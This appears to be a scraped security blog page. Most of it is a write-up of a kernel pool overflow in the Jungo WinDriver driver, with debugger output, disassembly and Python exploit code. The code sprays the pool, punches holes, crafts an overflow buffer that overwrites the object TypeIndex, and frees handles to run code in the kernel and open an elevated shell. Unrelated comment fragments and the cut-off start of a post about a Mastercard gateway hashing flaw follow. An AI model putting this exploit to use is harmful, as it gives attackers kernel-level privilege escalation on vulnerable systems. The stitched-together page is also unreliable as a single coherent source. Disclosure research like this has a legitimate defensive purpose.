verifier /volatile /flags 0x1 /adddriver windrvr1240.sys
and ran my fuzzer for a little bit, eventually finding several exploitable vulnerabilities. In particular, this one stood out:
kd> .trap 0xffffffffc800f96c ErrCode = 00000002 eax=e4e4e4e4 ebx=8df44ba8 ecx=8df45004 edx=805d2141 esi=f268d599 edi=00000088 eip=9ffbc9e5 esp=c800f9e0 ebp=c800f9ec iopl=0 nv up ei pl nz na pe cy cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010207 windrvr1240+0x199e5: 9ffbc9e5 8941fc mov dword ptr [ecx-4],eax ds:0023:8df45000=???????? kd> dd esi+ecx-4 805d2599 e4e4e4e4 e4e4e4e4 e4e4e4e4 e4e4e4e4 805d25a9 e4e4e4e4 e4e4e4e4 e4e4e4e4 e4e4e4e4 805d25b9 e4e4e4e4 e4e4e4e4 e4e4e4e4 e4e4e4e4 805d25c9 e4e4e4e4 e4e4e4e4 e4e4e4e4 e4e4e4e4 805d25d9 e4e4e4e4 e4e4e4e4 e4e4e4e4 e4e4e4e4 805d25e9 e4e4e4e4 e4e4e4e4 e4e4e4e4 e4e4e4e4 805d25f9 e4e4e4e4 e4e4e4e4 e4e4e4e4 e4e4e4e4 805d2609 e4e4e4e4 e4e4e4e4 e4e4e4e4 e4e4e4e4
That’s user controlled data stored in [esi+ecx] and it’s writing out-of-bounds of a kernel pool. Nice. On closer inspection, I noticed that this is actually a pool overflow triggered via an inline copy operation at loc_4199D8.
.text:0041998E sub_41998E proc near ; CODE XREF: sub_419B7C+3B2 .text:0041998E .text:0041998E arg_0 = dword ptr 8 .text:0041998E arg_4 = dword ptr 0Ch .text:0041998E .text:0041998E push ebp .text:0041998F mov ebp, esp .text:00419991 push ebx .text:00419992 mov ebx, [ebp+arg_4] .text:00419995 push esi .text:00419996 push edi .text:00419997 push 458h ; fized size_t +0x8 == 0x460 .text:0041999C xor edi, edi .text:0041999E push edi ; int .text:0041999F push ebx ; void * .text:004199A0 call memset ; memset our buffer before the overflow .text:004199A5 mov edx, [ebp+arg_0] ; this is the SystemBuffer .text:004199A8 add esp, 0Ch .text:004199AB mov eax, [edx] .text:004199AD mov [ebx], eax .text:004199AF mov eax, [edx+4] .text:004199B2 mov [ebx+4], eax .text:004199B5 mov eax, [edx+8] .text:004199B8 mov [ebx+8], eax .text:004199BB mov eax, [edx+10h] .text:004199BE mov [ebx+10h], eax .text:004199C1 mov eax, [edx+14h] .text:004199C4 mov [ebx+14h], eax .text:004199C7 mov eax, [edx+18h] ; read our controlled size from SystemBuffer .text:004199CA mov [ebx+18h], eax ; store it in the new kernel buffer .text:004199CD test eax, eax .text:004199CF jz short loc_4199ED .text:004199D1 mov esi, edx .text:004199D3 lea ecx, [ebx+1Ch] ; index offset for the first write .text:004199D6 sub esi, ebx .text:004199D8 .text:004199D8 loc_4199D8: ; CODE XREF: sub_41998E+5D .text:004199D8 mov eax, [esi+ecx] ; load the first write value from the buffer .text:004199DB inc edi ; copy loop index .text:004199DC mov [ecx], eax ; first dword write .text:004199DE lea ecx, [ecx+8] ; set the index into our overflown buffer .text:004199E1 mov eax, [esi+ecx-4] ; load the second write value from the buffer .text:004199E5 mov [ecx-4], eax ; second dword write .text:004199E8 cmp edi, [ebx+18h] ; compare against our controlled size .text:004199EB jb short loc_4199D8 ; jump back into loop
The copy loop actually copies 8 bytes on every iteration (a qword) and overflows a buffer of size 0x460 (0x458 + 0x8 byte header). The size of the copy is directly attacker controlled from the input buffer (yep, you read that right). No integer overflow, no size stored in some obscure place, nada. We can see at 0x004199E8 that the size is attacker controlled from the +0x18 offset of the supplied buffer. Too easy!
Exploitation
Now comes the fun bit. A generic technique that can be used is the object TypeIndex overwrite, which has been blogged about on numerous occasions (see references) and is at least 6 years old, so I won’t go into too much detail. Basically, the tl;dr is that using any kernel object, you can overwrite the TypeIndex stored in the _OBJECT_HEADER.
Some common objects that have been used in the past are the Event object (size 0x40) and the IoCompletionReserve object (size 0x60). Typical exploitation goes like this:
- Spray the pool with an object of size X, filling pages of memory.
- Make holes in the pages by freeing/releasing adjacent objects, triggering coalescing to match the target chunk size (in our case 0x460).
- Allocate and overflow the buffer, hopefully landing into a hole, smashing the next object’s _OBJECT_HEADER, thus, pwning the TypeIndex.
For example, say your overflowed buffer is size 0x200: you could allocate a whole bunch of Event objects, free 0x8 of them (0x40 * 0x8 == 0x200) and voilà, you have your hole where you can allocate and overflow. So, assuming that, we need a kernel object whose size divides evenly into our pool size.
The problem is, that doesn’t work with some sizes. For example our pool size is 0x460, so if we do:
>>> 0x460 % 0x40 32 >>> 0x460 % 0x60 64 >>>
We always have a remainder. This means we cannot craft a hole that will neatly fit our chunk. Or can we? There are a few ways to solve it. One way was to search for a kernel object whose size divides evenly into our target buffer size. I spent a little time doing this and found two other kernel objects:
# 1 type = "Job" size = 0x168 windll.kernel32.CreateJobObjectW(None, None) # 2 type = "Timer" size = 0xc8 windll.kernel32.CreateWaitableTimerW(None, 0, None)
However, those sizes were of no use as neither divides evenly into 0x460. After some time testing/playing around, I realized that we can do this:
>>> 0x460 % 0xa0 0 >>>
Great! So 0xa0 can be divided evenly into 0x460, but how do we get kernel objects of size 0xa0? Well if we combine the Event and the IoCompletionReserve objects (0x40 + 0x60 = 0xa0) then we can achieve it.
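The arithmetic behind mixing the two object types can be sanity-checked with a few lines of Python (sizes taken from the post above):

```python
# Neither object size divides the 0x460 target chunk on its own,
# but the combined (Event + IoCompletionReserve) pair does.
EVENT_SIZE = 0x40   # Event object, nonpaged pool
IOCO_SIZE = 0x60    # IoCompletionReserve object, nonpaged pool
TARGET = 0x460      # vulnerable allocation (0x458 + 0x8 header)

pair = EVENT_SIZE + IOCO_SIZE        # 0xa0

print(hex(TARGET % EVENT_SIZE))      # remainder left by Events alone
print(hex(TARGET % IOCO_SIZE))       # remainder left by IoCos alone
print(hex(TARGET % pair))            # no remainder for the pair
print(TARGET // pair)                # pairs needed to carve the hole
```

Seven freed pairs coalesce into exactly one 0x460 hole, which is what the spray and free steps below arrange.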
The Spray
def we_can_spray(): """ Spray the Kernel Pool with IoCompletionReserve and Event Objects. The IoCompletionReserve object is 0x60 and Event object is 0x40 bytes in length. These are allocated from the Nonpaged kernel pool. """ handles = [] IO_COMPLETION_OBJECT = 1 for i in range(0, 25000): handles.append(windll.kernel32.CreateEventA(0,0,0,0)) hHandle = HANDLE(0) handles.append(ntdll.NtAllocateReserveObject(byref(hHandle), 0x0, IO_COMPLETION_OBJECT)) # could do with some better validation if len(handles) > 0: return True return False
This function sprays 50,000 objects: 25,000 Event objects and 25,000 IoCompletionReserve objects. This looks quite pretty in windbg:
kd> !pool 85d1f000 Pool page 85d1f000 region is Nonpaged pool *85d1f000 size: 60 previous size: 0 (Allocated) *IoCo (Protected) Owning component : Unknown (update pooltag.txt) 85d1f060 size: 60 previous size: 60 (Allocated) IoCo (Protected) <--- chunk first allocated in the page 85d1f0c0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f100 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f160 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f1a0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f200 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f240 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f2a0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f2e0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f340 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f380 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f3e0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f420 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f480 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f4c0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f520 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f560 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f5c0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f600 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f660 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f6a0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f700 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f740 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f7a0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f7e0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f840 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f880 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f8e0 size: 40 previous 
size: 60 (Allocated) Even (Protected) 85d1f920 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f980 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f9c0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1fa20 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1fa60 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1fac0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1fb00 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1fb60 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1fba0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1fc00 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1fc40 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1fca0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1fce0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1fd40 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1fd80 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1fde0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1fe20 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1fe80 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1fec0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1ff20 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1ff60 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1ffc0 size: 40 previous size: 60 (Allocated) Even (Protected)
Creating Holes
The ‘IoCo’ tag represents an IoCompletionReserve object and the ‘Even’ tag represents an Event object. Notice that our first chunk’s offset is 0x60; that’s the offset we will start freeing from. So if we free groups of objects, that is, an IoCompletionReserve and an Event together, our calculation becomes:
>>> "0x%x" % (0x7 * 0xa0) '0x460' >>>
We will end up with the correct size. Let’s take a quick look at what it looks like if we free the next 7 IoCompletionReserve objects only.
kd> !pool 85d1f000 Pool page 85d1f000 region is Nonpaged pool *85d1f000 size: 60 previous size: 0 (Allocated) *IoCo (Protected) Owning component : Unknown (update pooltag.txt) 85d1f060 size: 60 previous size: 60 (Free) IoCo 85d1f0c0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f100 size: 60 previous size: 40 (Free) IoCo 85d1f160 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f1a0 size: 60 previous size: 40 (Free) IoCo 85d1f200 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f240 size: 60 previous size: 40 (Free) IoCo 85d1f2a0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f2e0 size: 60 previous size: 40 (Free) IoCo 85d1f340 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f380 size: 60 previous size: 40 (Free) IoCo 85d1f3e0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f420 size: 60 previous size: 40 (Free) IoCo 85d1f480 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f4c0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f520 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f560 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f5c0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f600 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f660 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f6a0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f700 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f740 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f7a0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f7e0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f840 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f880 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f8e0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f920 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f980 size: 40 previous size: 60 (Allocated) Even 
(Protected) 85d1f9c0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1fa20 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1fa60 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1fac0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1fb00 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1fb60 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1fba0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1fc00 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1fc40 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1fca0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1fce0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1fd40 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1fd80 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1fde0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1fe20 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1fe80 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1fec0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1ff20 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1ff60 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1ffc0 size: 40 previous size: 60 (Allocated) Even (Protected)
So we can see we have separate freed chunks, but we want to coalesce them into a single 0x460 freed chunk. To achieve this, we need to set the offset for our chunks to 0x60 (the first pointing to 0xXXXXY060).
bin = [] # object sizes CreateEvent_size = 0x40 IoCompletionReserve_size = 0x60 combined_size = CreateEvent_size + IoCompletionReserve_size # after the 0x20 chunk hole, the first object will be the IoCompletionReserve object offset = IoCompletionReserve_size for i in range(offset, offset + (7 * combined_size), combined_size): try: # chunks need to be next to each other for the coalesce to take effect bin.append(khandlesd[obj + i]) bin.append(khandlesd[obj + i - IoCompletionReserve_size]) except KeyError: pass # make sure it's contiguously allocated memory if len(tuple(bin)) == 14: holes.append(tuple(bin)) # make the holes to fill for hole in holes: for handle in hole: kernel32.CloseHandle(handle)
Now, when we run the freeing function, we punch holes into the pool and get a freed chunk of our target size.
kd> !pool 8674e000 Pool page 8674e000 region is Nonpaged pool *8674e000 size: 460 previous size: 0 (Free) *Io <-- 0x460 chunk is free Pooltag Io : general IO allocations, Binary : nt!io 8674e460 size: 60 previous size: 460 (Allocated) IoCo (Protected) 8674e4c0 size: 40 previous size: 60 (Allocated) Even (Protected) 8674e500 size: 60 previous size: 40 (Allocated) IoCo (Protected) 8674e560 size: 40 previous size: 60 (Allocated) Even (Protected) 8674e5a0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 8674e600 size: 40 previous size: 60 (Allocated) Even (Protected) 8674e640 size: 60 previous size: 40 (Allocated) IoCo (Protected) 8674e6a0 size: 40 previous size: 60 (Allocated) Even (Protected) 8674e6e0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 8674e740 size: 40 previous size: 60 (Allocated) Even (Protected) 8674e780 size: 60 previous size: 40 (Allocated) IoCo (Protected) 8674e7e0 size: 40 previous size: 60 (Allocated) Even (Protected) 8674e820 size: 60 previous size: 40 (Allocated) IoCo (Protected) 8674e880 size: 40 previous size: 60 (Allocated) Even (Protected) 8674e8c0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 8674e920 size: 40 previous size: 60 (Allocated) Even (Protected) 8674e960 size: 60 previous size: 40 (Allocated) IoCo (Protected) 8674e9c0 size: 40 previous size: 60 (Allocated) Even (Protected) 8674ea00 size: 60 previous size: 40 (Allocated) IoCo (Protected) 8674ea60 size: 40 previous size: 60 (Allocated) Even (Protected) 8674eaa0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 8674eb00 size: 40 previous size: 60 (Allocated) Even (Protected) 8674eb40 size: 60 previous size: 40 (Allocated) IoCo (Protected) 8674eba0 size: 40 previous size: 60 (Allocated) Even (Protected) 8674ebe0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 8674ec40 size: 40 previous size: 60 (Allocated) Even (Protected) 8674ec80 size: 60 previous size: 40 (Allocated) IoCo (Protected) 8674ece0 size: 40 previous size: 60 (Allocated) Even 
(Protected) 8674ed20 size: 60 previous size: 40 (Allocated) IoCo (Protected) 8674ed80 size: 40 previous size: 60 (Allocated) Even (Protected) 8674edc0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 8674ee20 size: 40 previous size: 60 (Allocated) Even (Protected) 8674ee60 size: 60 previous size: 40 (Allocated) IoCo (Protected) 8674eec0 size: 40 previous size: 60 (Allocated) Even (Protected) 8674ef00 size: 60 previous size: 40 (Allocated) IoCo (Protected) 8674ef60 size: 40 previous size: 60 (Allocated) Even (Protected) 8674efa0 size: 60 previous size: 40 (Allocated) IoCo (Protected)
We can see that the freed chunks have been coalesced and now we have a perfect sized hole. All we need to do is allocate and overwrite.
def we_can_trigger_the_pool_overflow(): """ This triggers the pool overflow vulnerability using a buffer of size 0x460. """ GENERIC_READ = 0x80000000 GENERIC_WRITE = 0x40000000 OPEN_EXISTING = 0x3 DEVICE_NAME = "\\\\.\\WinDrvr1240" dwReturn = c_ulong() driver_handle = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None) inputbuffer = 0x41414141 inputbuffer_size = 0x5000 outputbuffer_size = 0x5000 outputbuffer = 0x20000000 alloc_pool_overflow_buffer(inputbuffer, inputbuffer_size) IoStatusBlock = c_ulong() if driver_handle: dev_ioctl = ntdll.ZwDeviceIoControlFile(driver_handle, None, None, None, byref(IoStatusBlock), 0x953824b7, inputbuffer, inputbuffer_size, outputbuffer, outputbuffer_size) return True return False
Surviving the Overflow
You may have noticed the null dword in the exploit at offset 0x90 within the buffer.
def alloc_pool_overflow_buffer(base, input_size): """ Craft our special buffer to trigger the overflow. """ print "(+) allocating pool overflow input buffer" baseadd = c_int(base) size = c_int(input_size) input = "\x41" * 0x18 # offset to size input += struct.pack("<I", 0x0000008d) # controlled size (this triggers the overflow) input += "\x42" * (0x90-len(input)) # padding to survive bsod input += struct.pack("<I", 0x00000000) # use a NULL dword for sub_4196CA input += "\x43" * ((0x460-0x8)-len(input)) # fill our pool buffer
This is needed to survive the overflow and avoid any further processing. The following code listing is executed directly after the copy loop.
.text:004199ED loc_4199ED: ; CODE XREF: sub_41998E+41 .text:004199ED push 9 .text:004199EF pop ecx .text:004199F0 lea eax, [ebx+90h] ; controlled from the copy .text:004199F6 push eax ; void * .text:004199F7 lea esi, [edx+6Ch] ; controlled offset .text:004199FA lea eax, [edx+90h] ; controlled offset .text:00419A00 lea edi, [ebx+6Ch] ; controlled from copy .text:00419A03 rep movsd .text:00419A05 push eax ; int .text:00419A06 call sub_4196CA ; call sub_4196CA
The important point is that the code will call sub_4196CA. Also note that @eax becomes our buffer +0x90 (0x004199FA). Let’s take a look at that function call.
.text:004196CA sub_4196CA proc near ; CODE XREF: sub_4195A6+1E .text:004196CA ; sub_41998E+78 ... .text:004196CA .text:004196CA arg_0 = dword ptr 8 .text:004196CA arg_4 = dword ptr 0Ch .text:004196CA .text:004196CA push ebp .text:004196CB mov ebp, esp .text:004196CD push ebx .text:004196CE mov ebx, [ebp+arg_4] .text:004196D1 push edi .text:004196D2 push 3C8h ; size_t .text:004196D7 push 0 ; int .text:004196D9 push ebx ; void * .text:004196DA call memset .text:004196DF mov edi, [ebp+arg_0] ; controlled buffer .text:004196E2 xor edx, edx .text:004196E4 add esp, 0Ch .text:004196E7 mov [ebp+arg_4], edx .text:004196EA mov eax, [edi] ; make sure @eax is null .text:004196EC mov [ebx], eax ; the write here is fine .text:004196EE test eax, eax .text:004196F0 jz loc_4197CB ; take the jump
The code gets a dword value from our SystemBuffer at +0x90, writes to our overflowed buffer and then tests it for null. If it’s null, we can avoid further processing in this function and return.
.text:004197CB loc_4197CB: ; CODE XREF: sub_4196CA+26 .text:004197CB pop edi .text:004197CC pop ebx .text:004197CD pop ebp .text:004197CE retn 8
If we don’t do this, we will likely BSOD when attempting to access non-existent pointers from our buffer within this function (we could probably survive this anyway).
Now we can return cleanly and trigger the eop without any issues. For the shellcode cleanup, our overflown buffer is stored in @esi, so we can calculate the offset to the TypeIndex and patch it up. Finally, smashing the ObjectCreateInfo with null is fine because the system will just avoid using that pointer.
Crafting Our Buffer
Since the loop copies 0x8 bytes on every iteration and since the starting index is 0x1c:
.text:004199D3 lea ecx, [ebx+1Ch] ; index offset for the first write
We can do our overflow calculation like so. Let’s say we want to overflow the buffer by 44 bytes (0x2c). We take the buffer size, subtract the header, subtract the starting index offset, add the amount of bytes we want to overflow and divide it all by 0x8 (due to the qword copy per loop iteration).
(0x460 - 0x8 - 0x1c + 0x2c) / 0x8 = 0x8d
So a size of 0x8d will overflow the buffer by 0x2c or 44 bytes. This smashes the pool header, quota and object header.
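The calculation above generalizes to any desired overflow length; a small Python sketch of it (parameter names are mine, values from the disassembly above):

```python
def overflow_size(pool_size, overflow_bytes, header=0x8, index=0x1c, step=0x8):
    """Loop-count value to place at +0x18 of the input buffer: the copy
    loop writes `step` bytes per iteration starting at offset `index`
    into a `pool_size` allocation (pool header included)."""
    return (pool_size - header - index + overflow_bytes) // step

# 0x2c bytes past the 0x460 chunk smashes the next chunk's pool header,
# quota info and object header, through to ObjectCreateInfo.
print(hex(overflow_size(0x460, 0x2c)))
```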
# repair the allocated chunk header... input += struct.pack("<I", 0x040c008c) # _POOL_HEADER input += struct.pack("<I", 0xef436f49) # _POOL_HEADER (PoolTag) input += struct.pack("<I", 0x00000000) # _OBJECT_HEADER_QUOTA_INFO input += struct.pack("<I", 0x0000005c) # _OBJECT_HEADER_QUOTA_INFO input += struct.pack("<I", 0x00000000) # _OBJECT_HEADER_QUOTA_INFO input += struct.pack("<I", 0x00000000) # _OBJECT_HEADER_QUOTA_INFO input += struct.pack("<I", 0x00000001) # _OBJECT_HEADER (PointerCount) input += struct.pack("<I", 0x00000001) # _OBJECT_HEADER (HandleCount) input += struct.pack("<I", 0x00000000) # _OBJECT_HEADER (Lock) input += struct.pack("<I", 0x00080000) # _OBJECT_HEADER (TypeIndex) input += struct.pack("<I", 0x00000000) # _OBJECT_HEADER (ObjectCreateInfo)
We can see that we set the TypeIndex to 0x00080000 (actually, it’s the lower word) so that the index is null. This means that the function table will point to 0x0 and, conveniently enough, we can map the null page.
kd> dd nt!ObTypeIndexTable L2 82b7dee0 00000000 bad0b0b0
Note that the second index is 0xbad0b0b0. I get a funny feeling I can use this same technique on x64 as well :->
Triggering Code Execution in the Kernel
Well, we survive execution after triggering our overflow, but in order to gain eop we need to place a pointer at 0x00000074 to leverage the OkayToCloseProcedure function pointer.
kd> dt nt!_OBJECT_TYPE name 84fc8040 +0x008 Name : _UNICODE_STRING "IoCompletionReserve" kd> dt nt!_OBJECT_TYPE 84fc8040 . +0x000 TypeList : [ 0x84fc8040 - 0x84fc8040 ] +0x000 Flink : 0x84fc8040 _LIST_ENTRY [ 0x84fc8040 - 0x84fc8040 ] +0x004 Blink : 0x84fc8040 _LIST_ENTRY [ 0x84fc8040 - 0x84fc8040 ] +0x008 Name : "IoCompletionReserve" +0x000 Length : 0x26 +0x002 MaximumLength : 0x28 +0x004 Buffer : 0x88c01090 "IoCompletionReserve" +0x010 DefaultObject : +0x014 Index : 0x0 '' <--- TypeIndex is 0x0 +0x018 TotalNumberOfObjects : 0x61a9 +0x01c TotalNumberOfHandles : 0x61a9 +0x020 HighWaterNumberOfObjects : 0x61a9 +0x024 HighWaterNumberOfHandles : 0x61a9 +0x028 TypeInfo : <-- TypeInfo is offset 0x28 from 0x0 +0x000 Length : 0x50 +0x002 ObjectTypeFlags : 0x2 '' +0x002 CaseInsensitive : 0y0 +0x002 UnnamedObjectsOnly : 0y1 +0x002 UseDefaultObject : 0y0 +0x002 SecurityRequired : 0y0 +0x002 MaintainHandleCount : 0y0 +0x002 MaintainTypeList : 0y0 +0x002 SupportsObjectCallbacks : 0y0 +0x002 CacheAligned : 0y0 +0x004 ObjectTypeCode : 0 +0x008 InvalidAttributes : 0xb0 +0x00c GenericMapping : _GENERIC_MAPPING +0x01c ValidAccessMask : 0xf0003 +0x020 RetainAccess : 0 +0x024 PoolType : 0 ( NonPagedPool ) +0x028 DefaultPagedPoolCharge : 0 +0x02c DefaultNonPagedPoolCharge : 0x5c +0x030 DumpProcedure : (null) +0x034 OpenProcedure : (null) +0x038 CloseProcedure : (null) +0x03c DeleteProcedure : (null) +0x040 ParseProcedure : (null) +0x044 SecurityProcedure : 0x82cb02ac long nt!SeDefaultObjectMethod+0 +0x048 QueryNameProcedure : (null) +0x04c OkayToCloseProcedure : (null) <--- OkayToCloseProcedure is offset 0x4c from 0x0 +0x078 TypeLock : +0x000 Locked : 0y0 +0x000 Waiting : 0y0 +0x000 Waking : 0y0 +0x000 MultipleShared : 0y0 +0x000 Shared : 0y0000000000000000000000000000 (0) +0x000 Value : 0 +0x000 Ptr : (null) +0x07c Key : 0x6f436f49 +0x080 CallbackList : [ 0x84fc80c0 - 0x84fc80c0 ] +0x000 Flink : 0x84fc80c0 _LIST_ENTRY [ 0x84fc80c0 - 0x84fc80c0 ] +0x004 Blink : 0x84fc80c0 _LIST_ENTRY 
[ 0x84fc80c0 - 0x84fc80c0 ]
So, 0x28 + 0x4c = 0x74, which is where our pointer needs to be. But how is the OkayToCloseProcedure called? It turns out that this is a registered aexit handler. So to trigger the execution of code, one just needs to free the corrupted IoCompletionReserve. We don’t know which handle is associated with the overflown chunk, so we just free them all.
def trigger_lpe(): """ This function frees the IoCompletionReserve objects and this triggers the registered aexit, which is our controlled pointer to OkayToCloseProcedure. """ # free the corrupted chunk to trigger OkayToCloseProcedure for k, v in khandlesd.iteritems(): kernel32.CloseHandle(v) os.system("cmd.exe")
Obligatory, full sized screenshot:
Timeline
- 2017-08-22 – Verified and sent to Jungo via {sales,first,security,info}@jungo.com.
- 2017-08-25 – No response from Jungo and two bounced emails.
- 2017-08-26 – Attempted a follow up with the vendor via website chat.
- 2017-08-26 – No response via the website chat.
- 2017-09-03 – Received an email from a Jungo representative stating that they are “looking into it”.
- 2017-09-03 – Requested a timeframe for patch development and warned of a possible 0day release.
- 2017-09-06 – No response from Jungo.
- 2017-09-06 – Public 0day release of advisory.
Some people ask how long it takes me to develop exploits. Honestly, since the kernel is new to me, it took me a little longer than normal. For vulnerability analysis and exploitation of this bug, it took me 1.5 days (over the weekend) which is relatively slow for an older platform.
Conclusion
Any size chunk that is < 0x1000 can be exploited in this manner. As mentioned, this is not a new technique, but merely a variation to an already existing technique that I wouldn’t have discovered if I stuck to exploiting HEVD. Having said that, the ability to take a pre-existing vulnerable driver and develop exploitation techniques from it proves to be invaluable.
Kernel pool determinism is strong, simply because if you randomize more of the kernel, then the operating system takes a performance hit. The balance between security and performance has always been problematic, and it isn’t always so clear unless you are dealing directly with the kernel.
References
https://github.com/hacksysteam/HackSysExtremeVulnerableDriver
http://www.fuzzysecurity.com/tutorials/expDev/20.html
https://media.blackhat.com/bh-dc-11/Mandt/BlackHat_DC_2011_Mandt_kernelpool-Slides.pdf
https://msdn.microsoft.com/en-us/library/windows/desktop/ms724485(v=vs.85).aspx
https://www.exploit-db.com/exploits/34272
Shoutouts to beef, sicky, ryujin, skylined and bee13oy for the help! Here, you can find the advisory and the exploit.
-
Yeah, it's pathetic.
-
Eh, there are plenty of non-alumni who can write.
-
Mastercard Internet Gateway Service: Hashing Design Flaw
Last year I found a design error in the MD5 version of the hashing method used by the Mastercard Internet Gateway Service. The flaw allows modification of the transaction amount. They awarded me a bounty for reporting it. This year, they have switched to HMAC-SHA256, but this one also has a flaw (and no response from MasterCard).
If you just want to know what the bug is, just skip to the Flaw part.
What is MIGS?
When you pay on a website, the website owner usually just connects their system to an intermediate payment gateway (you will be forwarded to another website). This payment gateway then connects to several payment systems available in a country. For credit card payments, many gateways will connect to another gateway (one of them is MIGS) which works with many banks to provide the 3DSecure service.
How does it work?
The payment flow is usually like this if you use MIGS:
- You select items from an online store (merchant)
- You enter your credit card number on the website
- The card number, amount, etc is then signed and returned to the browser which will auto POST to intermediate payment gateway
- The intermediate payment gateway will convert the format to the one requested by MIGS, sign it (with MIGS key), and return it to the browser. Again this will auto POST, this time to MIGS server.
- If 3D Secure is not requested, go to step 6. If 3D Secure is requested, MIGS will redirect the request to the bank that issued the card, the bank will ask for an OTP, and then it will generate HTML that will auto POST data to MIGS
- MIGS will return a signed data to the browser, and will auto POST the data back to the intermediate Gateway
- The intermediate gateway will check whether the data is valid based on the signature. If it is not valid, an error page will be generated
- Based on MIGS response, payment gateway will forward the status to the merchant
Notice that instead of communicating directly between servers, communications are done via the user’s browser, but everything is signed. In theory, if the signing and verification processes are correct, then everything will be fine. Unfortunately, this is not always the case.
Flaw in the MIGS MD5 Hashing
This bug is extremely simple. The hashing method used is:
MD5(Secret + Data)
But it was not vulnerable to a hash length extension attack (some checks were done to prevent this). The data is created like this: take every query parameter that starts with vpc_, sort them by name, then concatenate the values only, without any delimiter. For example, if we have this data:
